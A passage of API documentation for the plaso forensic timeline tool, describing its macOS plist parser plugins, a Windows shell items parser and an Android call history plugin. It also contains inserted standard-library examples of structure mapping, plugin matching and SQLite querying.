class plaso.parsers.plist_plugins.appleaccount.AppleAccountPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for Apple Account plist files.
Further details about fields within the key:
Accounts: account name.
FirstName: first name associated with the account.
LastName: family name associated with the account.
CreationDate: timestamp when the account was configured on the system.
LastSuccessfulConnect: last time the account was connected.
ValidationDate: last time the account was validated.
DATA_FORMAT = 'Apple account information plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts relevant Apple Account entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'apple_id'
PLIST_KEYS = frozenset({'AccessorVersions', 'Accounts', 'AuthCertificates'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PrefixPlistPathFilter object>})
plaso.parsers.plist_plugins.bluetooth module
Plist parser plugin for Bluetooth plist files.
class plaso.parsers.plist_plugins.bluetooth.BluetoothPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for Bluetooth plist files.
Additional details about the fields.
LastInquiryUpdate: Device connected via Bluetooth Discovery. Updated when a device is detected in discovery mode, e.g. a Bluetooth headphone powering on. Pairing is not required for a device to be discovered and cached.
LastNameUpdate: When the human name was last set. Usually done only once during initial setup.
LastServicesUpdate: Time set when device was polled to determine what it is. Usually done at setup ormanually requested via advanced menu.
DATA_FORMAT = 'Bluetooth plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts relevant Bluetooth entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'macosx_bluetooth'
PLIST_KEYS = frozenset({'DeviceCache', 'PairedDevices'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
plaso.parsers.plist_plugins.default module
Default plist parser plugin.
class plaso.parsers.plist_plugins.default.DefaultPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Default plist parser plugin.
DATA_FORMAT = 'plist file'
GetEntries(parser_mediator, top_level=None, **unused_kwargs)
Extracts events from the values of entries within a plist.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• top_level (Optional[dict[str, object]]) – plist top-level item.
NAME = 'plist_default'
plaso.parsers.plist_plugins.dtfabric_plugin module
Shared functionality for dtFabric-based data format plist parser plugins.
class plaso.parsers.plist_plugins.dtfabric_plugin.DtFabricBasePlistPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Shared functionality for dtFabric-based data format plist parser plugins.
A dtFabric-based data format plist parser plugin defines its data format structures in a dtFabric definition file, for example "dtfabric.yaml":
name: int32
type: integer
description: 32-bit signed integer type
attributes:
  format: signed
  size: 4
  units: bytes
---
name: point3d
aliases: [POINT]
type: structure
description: Point in 3 dimensional space.
attributes:
  byte_order: little-endian
members:
- name: x
  aliases: [XCOORD]
  data_type: int32
- name: y
  data_type: int32
- name: z
  data_type: int32
The path to the definition file is defined in the class constant "_DEFINITION_FILE" and will be read on class instantiation.
The definition file contains data type definitions such as "int32" and "point3d" in the previous example.
A data type map can be used to create a Python object that represents the data type definition mapped to a byte stream, for example if we have the following byte stream: 01 00 00 00 02 00 00 00 03 00 00 00
The corresponding "point3d" Python object would be: point3d(x=1, y=2, z=3)
A plugin that wants to implement a dtFabric-based data format parser needs to:
• define a definition file and override _DEFINITION_FILE;
• implement the GetEntries method (the abstract method of this class).
The _GetDataTypeMap method of this class can be used to retrieve data type maps from the "fabric", which is the collection of the data type definitions in the definition file. Data type maps are cached for reuse.
The _ReadStructure method of this class can be used to read structure data from a file-like object and create a Python object using a data type map.
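Added example, not part of the plaso documentation or source: a standard-library stand-in for the data type map that the DtFabricBaseOLECFPlugin and DtFabricBasePlistPlugin docstrings above describe. It maps the quoted byte stream onto the "point3d" structure, shows what the byte_order and signed attributes change, and refuses a stream shorter than the structure, which is the check _ReadStructure has to make on evidence that may be truncated or corrupt. StructureMap, ReadStructure, ParsePoint and the INTEGER_FORMATS table are assumed names; dtfabric itself is not used.

```python
"""Stand-in for a dtFabric structure data type map, standard library only."""
import collections
import io
import struct

# (assumption) the integer type definitions reduced to struct format codes;
# "int32" from the YAML above is (signed, 4 bytes). Not dtfabric's own table.
INTEGER_FORMATS = {
    ('signed', 4): 'i',
    ('unsigned', 4): 'I',
    ('signed', 8): 'q',
    ('unsigned', 8): 'Q',
}
BYTE_ORDER_PREFIX = {'little-endian': '<', 'big-endian': '>'}


class StructureMap(object):
  """A structure data type map: a fixed layout mapped onto a byte stream."""

  def __init__(self, name, byte_order, members):
    """members is a list of (member_name, (integer_format, size)) tuples."""
    self.name = name
    format_codes = ''.join(
        INTEGER_FORMATS[(integer_format, size)]
        for _, (integer_format, size) in members)
    self._struct = struct.Struct(BYTE_ORDER_PREFIX[byte_order] + format_codes)
    self._tuple_type = collections.namedtuple(
        name, [member_name for member_name, _ in members])

  def GetSizeHint(self):
    """Returns the number of bytes the structure occupies."""
    return self._struct.size

  def MapByteStream(self, byte_stream):
    """Maps the byte stream onto a named tuple, refusing short input."""
    if len(byte_stream) < self._struct.size:
      raise ValueError(
          'byte stream too small for {0:s}: need {1:d} bytes, got {2:d}'.format(
              self.name, self._struct.size, len(byte_stream)))
    return self._tuple_type(*self._struct.unpack_from(byte_stream))


def ReadStructure(file_object, data_type_map):
  """Reads one structure from a file-like object (the role of _ReadStructure).

  A short read is not padded: the map raises, so a truncated item never
  produces a half-filled structure that looks like a valid record.
  """
  data = file_object.read(data_type_map.GetSizeHint())
  return data_type_map.MapByteStream(data)


POINT3D_MEMBERS = [
    ('x', ('signed', 4)), ('y', ('signed', 4)), ('z', ('signed', 4))]
POINT3D_LE = StructureMap('point3d', 'little-endian', POINT3D_MEMBERS)
# Same members, opposite byte order: what the byte_order attribute controls.
POINT3D_BE = StructureMap('point3d', 'big-endian', POINT3D_MEMBERS)

# Constructed input: the byte stream quoted in the docstring above.
SAMPLE_STREAM = bytes.fromhex('01000000' '02000000' '03000000')


def ParsePoint(byte_stream, data_type_map=POINT3D_LE):
  """Parses one point3d from the start of byte_stream."""
  return ReadStructure(io.BytesIO(byte_stream), data_type_map)
```

ParsePoint(SAMPLE_STREAM) gives point3d(x=1, y=2, z=3), as the docstring states; the same bytes read with POINT3D_BE give x=16777216, and a stream of ff ff ff ff in the first member gives x=-1 only because the format is signed. Both are the kind of silent misreading a definition file pins down.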
abstract GetEntries(parser_mediator, match=None, top_level=None, **unused_kwargs)
Extracts event objects from the values of entries within a plist.
This is the main method that a plist plugin needs to implement.
The contents of the plist keys defined in PLIST_KEYS will be made available to the plugin as match, a dict of the form {'KEY': 'value'}. The plugin should implement logic to parse this into a useful event for incorporation into the Plaso timeline.
For example, to note the timestamps of when devices were last seen (LastInquiryUpdate), the plugin needs to examine the Bluetooth configuration file 'com.apple.bluetooth' and look at the devices under the key 'DeviceCache'. To do this the plugin needs to define:
PLIST_PATH_FILTERS = frozenset([interface.PlistPathFilter('com.apple.bluetooth')])
PLIST_KEYS = frozenset(['DeviceCache'])
When a file with this key is encountered during processing, match is populated and the plugin's GetEntries() is called. The plugin would receive match = {'DeviceCache': {'DE:AD:BE:EF:01': {'LastInquiryUpdate': DateTime_Object}, ...}} and needs to implement logic here to extract values, format, and produce the data as an event.PlistEvent.
The attributes for a PlistEvent should include the following:
root = Root key this event was extracted from. E.g. DeviceCache/
key = Key the value resided in. E.g. 'DE:AD:BE:EF:01'
time = Date this artifact was created in number of microseconds (usec) since January 1, 1970, 00:00:00 UTC.
desc = Short description. E.g. 'Device LastInquiryUpdated'
See plist/bluetooth.py for the implemented example plugin.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
• top_level (Optional[dict[str, object]]) – plist top-level item.
plaso.parsers.plist_plugins.install_history module
Plist parser plugin for MacOS install history plist files.
class plaso.parsers.plist_plugins.install_history.InstallHistoryPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for MacOS install history plist files.
DATA_FORMAT = 'MacOS installation history plist file'
GetEntries(parser_mediator, top_level=None, **unused_kwargs)
Extracts relevant install history entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• top_level (Optional[dict[str, object]]) – plist top-level item.
NAME = 'macosx_install_history'
PLIST_KEYS = frozenset({'date', 'displayName', 'displayVersion', 'packageIdentifiers', 'processName'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
plaso.parsers.plist_plugins.interface module
Interface for plist parser plugins.
Plist files are only one example of a type of object that the Plaso tool is expected to encounter and process. There canbe and are many other parsers which are designed to process specific data types.
PlistPlugin defines the attributes necessary for registration, discovery and operation of plugins for plist files which willbe used by PlistParser.
class plaso.parsers.plist_plugins.interface.PlistPathFilter(filename)
Bases: object
The plist path filter.
Match(filename_lower_case)
Determines if a plist filename matches the filter.
Note that this method does a case insensitive comparison.
Parameters filename_lower_case (str) – filename of the plist in lower case.
Returns True if the filename matches the filter.
Return type bool
class plaso.parsers.plist_plugins.interface.PlistPlugin
Bases: plaso.parsers.plugins.BasePlugin
This is an abstract class on which plugins should be based.
The following are the attributes and methods expected to be overridden by a plugin.
PLIST_PATH_FILTERS
plist path filters that should match for the plugin to process the plist.
Type set[PlistPathFilter]
PLIST_KEYS
keys holding values that are necessary for processing.
Type set[str]
Please note, PLIST_KEYS is case sensitive and, for a plugin to match, a plist file needs to contain at minimum the keys needed for processing.
For example, if a plist file contains the following keys, {'foo': 1, 'bar': 2, 'opt': 3}, with 'foo' and 'bar' being keys critical to processing, define PLIST_KEYS as ['foo', 'bar']. If 'opt' is only optionally defined it can still be accessed by manually processing self.top_level from the plugin.
Methods: GetEntries() - extract and format info from keys and yields event.PlistEvent.
abstract GetEntries(parser_mediator, match=None, top_level=None, **unused_kwargs)
Extracts events from the values of entries within a plist.
This is the main method that a plist plugin needs to implement.
The contents of the plist keys defined in PLIST_KEYS will be made available to the plugin as match, a dict of the form {'KEY': 'value'}. The plugin should implement logic to parse this into a useful event for incorporation into the Plaso timeline.
For example, to note the timestamps of when devices were last seen (LastInquiryUpdate), the plugin needs to examine the Bluetooth configuration file 'com.apple.bluetooth' and look at the devices under the key 'DeviceCache'. To do this the plugin needs to define:
PLIST_PATH_FILTERS = frozenset([interface.PlistPathFilter('com.apple.bluetooth')])
PLIST_KEYS = frozenset(['DeviceCache'])
When a file with this key is encountered during processing, match is populated and the plugin's GetEntries() is called. The plugin would receive match = {'DeviceCache': {'DE:AD:BE:EF:01': {'LastInquiryUpdate': DateTime_Object}, ...}} and needs to implement logic here to extract values, format, and produce the data as an event.PlistEvent.
The attributes for a PlistEvent should include the following:
root = Root key this event was extracted from. E.g. DeviceCache/
key = Key the value resided in. E.g. 'DE:AD:BE:EF:01'
time = Date this artifact was created in number of microseconds (usec) since January 1, 1970, 00:00:00 UTC.
desc = Short description. E.g. ‘Device LastInquiryUpdated’
See plist/bluetooth.py for the implemented example plugin.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
• top_level (Optional[dict[str, object]]) – plist top-level item.
NAME = 'plist_plugin'
PLIST_KEYS = frozenset({'any'})
PLIST_PATH_FILTERS = frozenset({})
Process(parser_mediator, top_level=None, **kwargs)
Determine if this is the correct plugin; if so proceed with processing.
Process() checks if the current plist being processed is a match for a plugin by comparing the PATH andKEY requirements defined by a plugin.
This function also extracts the required keys as defined in self.PLIST_KEYS from the plist and stores theresult in self.match[key] and calls self.GetEntries() which holds the processing logic implemented by theplugin.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers andother components, such as storage and dfvfs.
• top_level (Optional[dict[str, object]]) – plist top-level item.
URLS = []
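Added example, not plaso's own code: the Process() contract described above (path filter, required keys, the match dict, GetEntries) reproduced with the standard library for the Bluetooth case used in the docstring. DeviceCachePlugin, RunPlugin and the constructed SAMPLE_PLIST are assumptions, as is the "all required keys must be present" reading of the key check; the path filter uses the full file name com.apple.bluetooth.plist, where the docstring example writes it without the extension.

```python
"""Plist plugin matching and key extraction, standard library only."""
import datetime
import plistlib


class PlistPathFilter(object):
  """Exact, case-insensitive file name match (contract of interface.PlistPathFilter)."""

  def __init__(self, filename):
    self._filename_lower_case = filename.lower()

  def Match(self, filename_lower_case):
    return filename_lower_case == self._filename_lower_case


class PrefixPlistPathFilter(PlistPathFilter):
  """Matches on a file name prefix (contract of interface.PrefixPlistPathFilter)."""

  def Match(self, filename_lower_case):
    return filename_lower_case.startswith(self._filename_lower_case)


class DeviceCachePlugin(object):
  """Toy plugin (assumed name) with the Bluetooth settings from the docstring."""

  NAME = 'toy_bluetooth'
  # (assumption) full file name; the docstring writes it without ".plist".
  PLIST_PATH_FILTERS = frozenset([PlistPathFilter('com.apple.bluetooth.plist')])
  PLIST_KEYS = frozenset(['DeviceCache'])

  def Process(self, filename, top_level):
    """Applies the path and key checks, then runs GetEntries.

    Returns the list of extracted events, or None when the plugin does not
    match, in which case the parser would move on to the next plugin.
    """
    filename_lower_case = filename.lower()
    if self.PLIST_PATH_FILTERS and not any(
        path_filter.Match(filename_lower_case)
        for path_filter in self.PLIST_PATH_FILTERS):
      return None
    # (assumption) every key in PLIST_KEYS must be present; the interface text
    # says the plist must contain "at minimum" the keys needed for processing.
    if not self.PLIST_KEYS.issubset(top_level):
      return None
    match = {key: top_level[key] for key in self.PLIST_KEYS}
    return list(self.GetEntries(match=match))

  def GetEntries(self, match=None):
    """Yields (root, key, time, desc) for each device with a LastInquiryUpdate."""
    for device_key, device_values in match['DeviceCache'].items():
      timestamp = device_values.get('LastInquiryUpdate')
      if not isinstance(timestamp, datetime.datetime):
        continue  # a cached device never seen in discovery has no timestamp
      yield ('/DeviceCache', device_key, timestamp, 'Device LastInquiryUpdate')


# Constructed sample plist (not a real device record): one device with a
# last-seen timestamp and one without.
SAMPLE_PLIST = plistlib.dumps({
    'DeviceCache': {
        'DE:AD:BE:EF:01': {
            'Name': 'Headset',
            'LastInquiryUpdate': datetime.datetime(2020, 10, 1, 8, 30, 0)},
        'DE:AD:BE:EF:02': {'Name': 'Keyboard'}},
    'PairedDevices': ['DE:AD:BE:EF:01']})

# Constructed plist with the right file name but without the required key.
SAMPLE_PLIST_NO_CACHE = plistlib.dumps({'PairedDevices': []})


def RunPlugin(filename, plist_data):
  """Loads plist_data and runs the toy plugin against it."""
  return DeviceCachePlugin().Process(filename, plistlib.loads(plist_data))
```

RunPlugin('com.apple.bluetooth.plist', SAMPLE_PLIST) yields exactly one event, for DE:AD:BE:EF:01; the same data under another file name, or a com.apple.bluetooth.plist without a DeviceCache key, yields None rather than an empty or partial result, which is what keeps a plugin from claiming a plist that merely looks similar.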
class plaso.parsers.plist_plugins.interface.PrefixPlistPathFilter(filename)
Bases: plaso.parsers.plist_plugins.interface.PlistPathFilter
The prefix plist path filter.
Match(filename_lower_case)
Determines if a plist filename matches the filter.
Note that this method does a case insensitive comparison.
Parameters filename_lower_case (str) – filename of the plist in lower case.
Returns True if the filename matches the filter.
Return type bool
plaso.parsers.plist_plugins.ipod module
Plist parser plugin for iPod, iPad and iPhone storage plist files.
class plaso.parsers.plist_plugins.ipod.IPodPlistEventData
Bases: plaso.containers.events.EventData
iPod plist event data.
device_id
unique identifier of the iPod device.
Type str
DATA_TYPE = 'ipod:device:entry'
class plaso.parsers.plist_plugins.ipod.IPodPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for iPod, iPad and iPhone storage plist files.
DATA_FORMAT = 'iPod, iPad and iPhone plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extract device information from the iPod plist.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'ipod_device'
PLIST_KEYS = frozenset({'Devices'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
plaso.parsers.plist_plugins.launchd module
Plist parser plugin for launchd plist files.
class plaso.parsers.plist_plugins.launchd.LaunchdPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for launchd plist files.
Further details about fields within the key:
Label: the required key for uniquely identifying the launchd service.
Program: absolute path to the executable. required in the absence of the ProgramArguments key.
ProgramArguments: command-line flags for the executable. required in the absence of the Program key.
UserName: the job run as the specified user.
GroupName: the job run as the specified group.
DATA_FORMAT = 'Launchd plist file'
GetEntries(parser_mediator, top_level=None, **unused_kwargs)
Extracts launchd information from the plist.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• top_level (Optional[dict[str, object]]) – plist top-level item.
NAME = 'launchd_plist'
PLIST_KEYS = frozenset({'GroupName', 'Label', 'Program', 'ProgramArguments', 'UserName'})
plaso.parsers.plist_plugins.macuser module
Plist parser plugin for MacOS user plist files.
class plaso.parsers.plist_plugins.macuser.MacUserPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for MacOS user plist files.
Further details about the extracted fields.
name: string with the system user.
uid: user ID.
passwordpolicyoptions: XML Plist structures with the timestamp.
passwordLastSetTime: last time the password was changed.
lastLoginTimestamp: last time the user was authenticated. Depending on the situation these timestamps are reset (0 value), which the library translates to 2001-01-01 00:00:00 (the Cocoa zero time representation). If this happens, the event is not yielded.
failedLoginTimestamp: last time the user's password was entered incorrectly.
failedLoginCount: times of incorrect passwords.
DATA_FORMAT = 'MacOS user plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts relevant user timestamp entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'macuser'
PLIST_KEYS = frozenset({'ShadowHashData', 'home', 'name', 'passwordpolicyoptions', 'uid'})
plaso.parsers.plist_plugins.safari module
Plist parser plugin for Safari history plist files.
class plaso.parsers.plist_plugins.safari.SafariHistoryEventData
Bases: plaso.containers.events.EventData
Safari history event data.
display_title
display title of the webpage visited.
Type str
title
title of the webpage visited.
Type str
url
URL visited.
Type str
visit_count
number of times the website was visited.
Type int
was_http_non_get
True if the webpage was visited using a non-GET HTTP request.
Type bool
DATA_TYPE = 'safari:history:visit'
class plaso.parsers.plist_plugins.safari.SafariHistoryPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for Safari history plist files.
DATA_FORMAT = 'Safari history plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts Safari history items.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'safari_history'
PLIST_KEYS = frozenset({'WebHistoryDates', 'WebHistoryFileVersion'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
plaso.parsers.plist_plugins.softwareupdate module
Plist parser plugin for MacOS software update plist files.
class plaso.parsers.plist_plugins.softwareupdate.SoftwareUpdatePlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for MacOS software update plist files.
Further details about the extracted fields:
LastFullSuccessfulDate: timestamp of the last full MacOS update.
LastSuccessfulDate: timestamp of the last partial MacOS update.
DATA_FORMAT = 'MacOS software update plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts relevant MacOS update entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'macos_software_update'
PLIST_KEYS = frozenset({'LastAttemptSystemVersion', 'LastFullSuccessfulDate', 'LastRecommendedUpdatesAvailable', 'LastSuccessfulDate', 'LastUpdatesAvailable', 'RecommendedUpdates'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
plaso.parsers.plist_plugins.spotlight module
Plist parser plugin for Spotlight searched terms plist files.
class plaso.parsers.plist_plugins.spotlight.SpotlightPlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for Spotlight searched terms plist files.
Further information about extracted fields:
name of the item: search term.
PATH: path of the program associated with the term.
LAST_USED: last time the term was used.
DISPLAY_NAME: the display name of the associated program.
DATA_FORMAT = 'Spotlight plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts relevant Spotlight entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'spotlight'
PLIST_KEYS = frozenset({'UserShortcuts'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
plaso.parsers.plist_plugins.spotlight_volume module
Plist parser plugin for Spotlight volume configuration plist files.
class plaso.parsers.plist_plugins.spotlight_volume.SpotlightVolumePlugin
Bases: plaso.parsers.plist_plugins.interface.PlistPlugin
Plist parser plugin for Spotlight volume configuration plist files.
DATA_FORMAT = 'Spotlight volume configuration plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts relevant Spotlight volume configuration entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'spotlight_volume'
PLIST_KEYS = frozenset({'Stores'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
plaso.parsers.plist_plugins.timemachine module
Plist parser plugin for TimeMachine plist files.
class plaso.parsers.plist_plugins.timemachine.TimeMachinePlugin
Bases: plaso.parsers.plist_plugins.dtfabric_plugin.DtFabricBasePlistPlugin
Plist parser plugin for TimeMachine plist files.
Further details about the extracted fields:
DestinationID: UUID of the remote hard disk where the backup is stored.
BackupAlias: structure that contains the extra information from the destinationID.
SnapshotDates: list of the backup dates.
DATA_FORMAT = 'TimeMachine plist file'
GetEntries(parser_mediator, match=None, **unused_kwargs)
Extracts relevant TimeMachine entries.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• match (Optional[dict[str, object]]) – keys extracted from PLIST_KEYS.
NAME = 'time_machine'
PLIST_KEYS = frozenset({'Destinations', 'RootVolumeUUID'})
PLIST_PATH_FILTERS = frozenset({<plaso.parsers.plist_plugins.interface.PlistPathFilter object>})
Module contents
Imports for the plist parser plugins.
plaso.parsers.shared package
Submodules
plaso.parsers.shared.shell_items module
Parser for Windows NT shell items.
class plaso.parsers.shared.shell_items.ShellItemsParser(origin)
Bases: object
Parser for Windows NT shell items.
CopyToPath()
Copies the shell items to a path.
Returns converted shell item list path or None.
Return type str
GetUpperPathSegment()
Retrieves the upper shell item path segment.
Returns shell item path segment or “N/A”.
Return type str
NAME = 'shell_items'
ParseByteStream(parser_mediator, byte_stream, parent_path_segments=None, codepage='cp1252')
Parses the shell items from the byte stream.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• byte_stream (bytes) – shell items data.
• parent_path_segments (Optional[list[str]]) – parent shell item path segments.
• codepage (Optional[str]) – byte stream codepage.
Module contents
plaso.parsers.sqlite_plugins package
Submodules
plaso.parsers.sqlite_plugins.android_calls module
SQLite parser plugin for Android call history database files.
class plaso.parsers.sqlite_plugins.android_calls.AndroidCallEventData
Bases: plaso.containers.events.EventData
Android Call event data.
call_type
type of call, such as: Incoming, Outgoing, or Missed.
Type str
duration
number of seconds the call lasted.
Type int
name
name associated to the remote party.
Type str
number
phone number associated to the remote party.
Type str
DATA_TYPE = 'android:event:call'
class plaso.parsers.sqlite_plugins.android_calls.AndroidCallPlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Android call history database files.
The Android call history database file is typically stored in: contacts2.db
CALL_TYPE = {1: 'INCOMING', 2: 'OUTGOING', 3: 'MISSED'}
DATA_FORMAT = 'Android call history SQLite database (contacts2.db) file'
NAME = 'android_calls'
ParseCallsRow(parser_mediator, query, row, **unused_kwargs)
Parses a Call record row.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• query (str) – query that created the row.
• row (sqlite3.Row) – row.
QUERIES = [('SELECT _id AS id, date, number, name, duration, type FROM calls', 'ParseCallsRow')]
REQUIRED_STRUCTURE = {'calls': frozenset({'_id', 'date', 'duration', 'name', 'number', 'type'})}
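Added example, not plaso's own code: the android_calls QUERIES entry run against a constructed contacts2.db built from the calls statement in SCHEMAS, with REQUIRED_STRUCTURE checked against the live schema before the query is issued, which is what keeps a SQLite plugin from matching an unrelated database or failing mid-query on one with a different layout. BuildSampleDatabase, CheckRequiredStructure, ParseCalls and the sample rows are assumptions, and so is the reading of the date column as milliseconds since the epoch, marked in the code.

```python
"""Running the android_calls query against a constructed calls table."""
import sqlite3

CALL_TYPE = {1: 'INCOMING', 2: 'OUTGOING', 3: 'MISSED'}
QUERY = 'SELECT _id AS id, date, number, name, duration, type FROM calls'
REQUIRED_STRUCTURE = {
    'calls': frozenset(['_id', 'date', 'duration', 'name', 'number', 'type'])}

# The "calls" CREATE TABLE statement from SCHEMAS above.
CALLS_SCHEMA = (
    'CREATE TABLE calls (_id INTEGER PRIMARY KEY AUTOINCREMENT, number TEXT, '
    'date INTEGER, duration INTEGER, type INTEGER, new INTEGER, name TEXT, '
    'numbertype INTEGER, numberlabel TEXT, countryiso TEXT, voicemail_uri TEXT, '
    'is_read INTEGER, geocoded_location TEXT, lookup_uri TEXT, '
    'matched_number TEXT, normalized_number TEXT, '
    'photo_id INTEGER NOT NULL DEFAULT 0, formatted_number TEXT, _data TEXT, '
    'has_content INTEGER, mime_type TEXT, source_data TEXT, '
    'source_package TEXT, state INTEGER)')

# Constructed rows (number, date, duration, type, name). (assumption) "date"
# holds milliseconds since the Unix epoch; the page does not state the unit.
SAMPLE_ROWS = [
    ('+15551230001', 1601542800000, 42, 1, 'Alice'),
    ('+15551230002', 1601546400000, 0, 3, None),
    ('+15551230003', 1601550000000, 7, 2, 'Bob'),
]


def BuildSampleDatabase():
  """Creates an in-memory contacts2.db look-alike holding only the calls table."""
  connection = sqlite3.connect(':memory:')
  connection.execute(CALLS_SCHEMA)
  connection.executemany(
      'INSERT INTO calls (number, date, duration, type, name) '
      'VALUES (?, ?, ?, ?, ?)', SAMPLE_ROWS)
  connection.commit()
  return connection


def CheckRequiredStructure(connection, required_structure):
  """Returns True if every required table exists with all required columns."""
  for table_name, required_columns in required_structure.items():
    # table_name comes from the plugin's own constant, never from the evidence,
    # so interpolating it into the PRAGMA is safe here.
    rows = connection.execute('PRAGMA table_info({0:s})'.format(table_name))
    present_columns = {row[1] for row in rows}  # column 1 of table_info is the name
    if not required_columns.issubset(present_columns):
      return False
  return True


def ParseCalls(connection):
  """Runs QUERY and resolves each row the way ParseCallsRow would."""
  if not CheckRequiredStructure(connection, REQUIRED_STRUCTURE):
    raise ValueError('database lacks the structure required by android_calls')
  connection.row_factory = sqlite3.Row
  events = []
  for row in connection.execute(QUERY):
    events.append({
        'id': row['id'],
        # seconds since the epoch, under the millisecond assumption above
        'timestamp': row['date'] / 1000.0,
        'number': row['number'],
        'name': row['name'],
        'duration': row['duration'],
        'call_type': CALL_TYPE.get(row['type'], 'UNKNOWN'),
    })
  return events
```

ParseCalls(BuildSampleDatabase()) returns three records with call_type resolved through CALL_TYPE and the NULL name carried through as None; a type value outside the table maps to 'UNKNOWN' instead of raising, and a database whose calls table lacks one of the REQUIRED_STRUCTURE columns is rejected before any query runs.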
SCHEMAS = [{'_sync_state': 'CREATE TABLE _sync_state (_id INTEGER PRIMARY KEY, account_name TEXT NOT NULL, account_type TEXT NOT NULL, data TEXT, UNIQUE(account_name, account_type))', '_sync_state_metadata': 'CREATE TABLE _sync_state_metadata (version INTEGER)', 'accounts': 'CREATE TABLE accounts (_id INTEGER PRIMARY KEY AUTOINCREMENT, account_name TEXT, account_type TEXT, data_set TEXT)', 'agg_exceptions': 'CREATE TABLE agg_exceptions (_id INTEGER PRIMARY KEY AUTOINCREMENT, type INTEGER NOT NULL, raw_contact_id1 INTEGER REFERENCES raw_contacts(_id), raw_contact_id2 INTEGER REFERENCES raw_contacts(_id))', 'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'calls': 'CREATE TABLE calls (_id INTEGER PRIMARY KEY AUTOINCREMENT, number TEXT, date INTEGER, duration INTEGER, type INTEGER, new INTEGER, name TEXT, numbertype INTEGER, numberlabel TEXT, countryiso TEXT, voicemail_uri TEXT, is_read INTEGER, geocoded_location TEXT, lookup_uri TEXT, matched_number TEXT, normalized_number TEXT, photo_id INTEGER NOT NULL DEFAULT 0, formatted_number TEXT, _data TEXT, has_content INTEGER, mime_type TEXT, source_data TEXT, source_package TEXT, state INTEGER)', 'contacts': 'CREATE TABLE contacts (_id INTEGER PRIMARY KEY AUTOINCREMENT, name_raw_contact_id INTEGER REFERENCES raw_contacts(_id), photo_id INTEGER REFERENCES data(_id), photo_file_id INTEGER REFERENCES photo_files(_id), custom_ringtone TEXT, send_to_voicemail INTEGER NOT NULL DEFAULT 0, times_contacted INTEGER NOT NULL DEFAULT 0, last_time_contacted INTEGER, starred INTEGER NOT NULL DEFAULT 